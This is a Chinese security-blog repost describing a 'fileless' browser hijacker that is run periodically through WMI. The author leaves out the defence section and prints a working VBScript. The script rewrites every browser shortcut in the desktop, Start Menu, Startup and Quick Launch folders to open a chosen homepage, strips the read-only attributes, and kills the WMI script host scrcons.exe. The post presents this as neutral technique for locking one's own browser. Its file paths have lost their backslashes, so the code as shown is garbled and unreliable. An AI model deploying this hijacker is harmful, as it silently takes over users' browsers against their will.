Fileless Browser Hijacker劫持浏览器首页

  • A+
所属分类:安全文章

From:
http://zone.wooyun.org/content/26997

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本,执行后可修改当前系统中常见浏览器的主页
通过wmi定时调用此脚本可实现无文件劫持浏览器主页
原文已给出防御和检测方法,所以此处略
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下,主页锁定为http://www.baidu.com 

Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://www.baidu.com"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
BrowserDic.Add LCase(browser), browser
Next
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:UsersPublicDesktop"
FoldersDic(1) = "C:ProgramDataMicrosoftWindowsStart Menu"
FoldersDic(2) = "C:ProgramDataMicrosoftWindowsStart MenuPrograms"
FoldersDic(3) = "C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup"
FoldersDic(4) = "C:UsersaDesktop"
FoldersDic(5) = "C:UsersaAppDataRoamingMicrosoftWindowsStart Menu"
FoldersDic(6) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuPrograms"
FoldersDic(7) = "C:UsersaAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup"
FoldersDic(8) = "C:UsersaAppDataRoaming"
FoldersDic(9) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick Launch"
FoldersDic(10) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu"
FoldersDic(11) = "C:UsersaAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
Next
Next
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0


执行后会更改系统中浏览器的主页,如图


本文始发于微信公众号(关注安全技术):Fileless Browser Hijacker劫持浏览器首页

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: